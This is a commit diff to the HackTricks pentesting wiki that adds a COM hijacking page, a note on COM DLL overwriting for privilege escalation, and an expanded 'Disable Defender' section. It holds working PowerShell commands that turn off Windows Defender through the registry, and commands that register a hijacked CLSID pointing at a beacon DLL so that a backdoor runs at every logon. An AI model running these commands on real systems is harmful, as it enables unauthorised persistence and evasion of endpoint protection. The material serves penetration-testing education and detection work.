GitBook: [#3366] No subject

SUMMARY.md

@@ -139,6 +139,7 @@
   * [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
   * [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
   * [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
+  * [COM Hijacking](windows-hardening/windows-local-privilege-escalation/com-hijacking.md)
   * [From High Integrity to SYSTEM with Name Pipes](windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md)
   * [Integrity Levels](windows-hardening/windows-local-privilege-escalation/integrity-levels.md)
   * [JAWS](windows-hardening/windows-local-privilege-escalation/jaws.md)

pentesting-web/hacking-jwt-json-web-tokens.md

@@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-![](<../.gitbook/assets/image (638).png>)
+![](<../.gitbook/assets/image (638) (3).png>)
 
 **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 

windows-hardening/basic-powershell-for-pentesters/README.md

@@ -176,14 +176,16 @@ Get-NetConnectionProfile |
   }
 ```
 
-## Antivirus
+## Disable Defender
 
 ```bash
-#Check status
+# Check status
 Get-MpComputerStatus
-#Disable
+# Disable
 Set-MpPreference -DisableRealtimeMonitoring $true
-#Set exclusion path
+#To completely disable Windows Defender on a computer, use the command:
+New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
+# Set exclusion path
 Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
 ```
 

windows-hardening/windows-local-privilege-escalation/README.md

@@ -1328,6 +1328,24 @@ Tools to extract passwords from browsers:
 * Mimikatz: `dpapi::chrome`
 * [**SharpWeb**](https://github.com/djhohnstein/SharpWeb)
 
+### **COM DLL Overwriting**
+
+**Component Object Model (COM)** is a technology built within the Windows operating system that allows **intercommunication** between software components of different languages. **** Each COM component is **identified via a class ID (CLSID)** and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
+
+COM classes and interfaces are defined in the registry under **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and **HKEY\_**_**CLASSES\_**_**ROOT\Interface** respectively. This registry is created by merging the **HKEY\_**_**LOCAL\_**_**MACHINE\Software\Classes** + **HKEY\_**_**CURRENT\_**_**USER\Software\Classes** = **HKEY\_**_**CLASSES\_**_**ROOT.**
+
+Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral).
+
+![](<../../.gitbook/assets/image (638).png>)
+
+Basically, if you can **overwrite any of the DLLs** that are going to be executed, you could **escalate privileges** if that DLL is going to be executed by a different user.
+
+To learn how attackers use COM Hijacking as a persistence mechanism check:
+
+{% content-ref url="com-hijacking.md" %}
+[com-hijacking.md](com-hijacking.md)
+{% endcontent-ref %}
+
 ### **Generic Password search in files and registry**
 
 **Search for file contents**

windows-hardening/windows-local-privilege-escalation/com-hijacking.md

@@ -0,0 +1,106 @@
+# COM Hijacking
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+### Searching not existent COM components
+
+As the values of HKCU can be modified by the users **COM Hijacking** could be used as a **persistent mechanisms**. Using `procmon` it's easy to find searched COM registries that doesn't exist that an attacker could create to persist. Filters:
+
+* **RegOpenKey** operations.
+* where the _Result_ is **NAME NOT FOUND**.
+* and the _Path_ ends with **InprocServer32**.
+
+Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._&#x20;
+
+```bash
+New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
+New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
+New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
+```
+
+### Hijackable Task Scheduler COM components
+
+Windows Tasks actually use Custom Triggers to call COM objects. And because they're executed via the Task Scheduler, it's easier to predict when they're going to be triggered.
+
+<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
+$Tasks = Get-ScheduledTask
+
+foreach ($Task in $Tasks)
+{
+  if ($Task.Actions.ClassId -ne $null)
+  {
+    if ($Task.Triggers.Enabled -eq $true)
+    {
+      if ($Task.Principal.GroupId -eq "Users")
+      {
+        Write-Host "Task Name: " $Task.TaskName
+        Write-Host "Task Path: " $Task.TaskPath
+        Write-Host "CLSID: " $Task.Actions.ClassId
+        Write-Host
+      }
+    }
+  }
+}
+
+# Sample Output:
+<strong># Task Name:  Example
+</strong># Task Path:  \Microsoft\Windows\Example\
+# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
+# [more like the previous one...]</code></pre>
+
+Checking the output you can select one that is going to be executed **every time a user logs in** for example.
+
+Now searching for the CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** in **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.
+
+```bash
+# Exists in HKCR\CLSID\
+Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
+
+Name           Property
+----           --------
+InprocServer32 (default)      : C:\Windows\system32\some.dll
+               ThreadingModel : Both
+
+# Exists in HKLM
+Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
+
+Name                                   Property
+----                                   --------
+{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
+
+# Doesn't exist in HKCU
+PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
+Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
+```
+
+Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>